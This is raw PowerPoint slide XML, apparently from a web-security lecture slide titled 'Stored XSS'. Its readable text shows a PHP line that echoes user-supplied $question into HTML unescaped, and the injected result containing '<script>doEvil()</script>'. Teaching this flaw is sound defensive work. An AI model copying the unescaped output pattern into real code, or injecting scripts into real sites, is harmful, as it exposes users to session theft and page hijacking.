                <a:path w="1143000" h="636269">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29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766964" y="3114283"/>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0" name="object 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="object 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1423708" y="2330424"/>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3" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1423708" y="2330424"/>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4" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="678667" y="2568963"/>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37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1736193" y="3197725"/>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38" name="object 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425257" y="2393010"/>
              <a:ext cx="365125" cy="55880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="365125" h="55880">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1" name="object 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425257" y="2393010"/>
              <a:ext cx="365125" cy="55880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="365125" h="55880">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2" name="object 42"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273726" y="3603749"/>
            <a:ext cx="1134533" cy="119755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="233674">
              <a:spcBef>
                <a:spcPts val="133"/>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4" name="object 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="object 45"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="object 46"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="673112" y="2563418"/>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48" name="object 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="684212" y="2596705"/>
              <a:ext cx="233679" cy="154305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="233680" h="154305">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49" name="object 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="891074" y="3506294"/>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50" name="object 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367764" y="1456945"/>
            <a:ext cx="8807027" cy="1802553"/>
            <a:chOff x="275823" y="1092708"/>
            <a:chExt cx="6605270" cy="1351915"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="object 51"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="292608" y="1092708"/>
              <a:ext cx="6588250" cy="784847"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 52"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="337794" y="1118958"/>
              <a:ext cx="6493515" cy="688949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="337794" y="1118958"/>
              <a:ext cx="6494145" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6494145" h="688975">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6493522" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6493522" y="688949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="688949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524">
              <a:solidFill>
                <a:srgbClr val="4A7EBB"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="object 54"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="object 55"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId18" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="object 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63555" y="3662876"/>
            <a:ext cx="774700" cy="242866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Ass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>te</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="object 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="1653134"/>
            <a:ext cx="1227667" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CODE:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="object 58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2060449" y="1653134"/>
            <a:ext cx="6140873" cy="230293"/>
            <a:chOff x="1545336" y="1239850"/>
            <a:chExt cx="4605655" cy="172720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="object 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1545336" y="1239850"/>
              <a:ext cx="182880" cy="172720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="182880" h="172719">
                  <a:moveTo>
                    <a:pt x="182880" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182880" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182880" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDF8E3"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1728216" y="1239850"/>
              <a:ext cx="4238625" cy="172720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4238625" h="172719">
                  <a:moveTo>
                    <a:pt x="4238244" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4238244" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4238244" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4238244" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FEFCF5"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="object 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5966459" y="1239850"/>
              <a:ext cx="184785" cy="172720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="184785" h="172719">
                  <a:moveTo>
                    <a:pt x="184403" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDF8E3"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="object 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043515" y="1601653"/>
            <a:ext cx="6173047" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class=’question'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="object 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="2053454"/>
            <a:ext cx="7860453" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="60" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="80" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="93" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’question'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466505" y="333396"/>
            <a:ext cx="3258820"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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="65" name="object 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="34544" y="4514375"/>
            <a:ext cx="3448473" cy="2284307"/>
            <a:chOff x="25907" y="3385781"/>
            <a:chExt cx="2586355" cy="1713230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="66" name="object 66"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId19" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
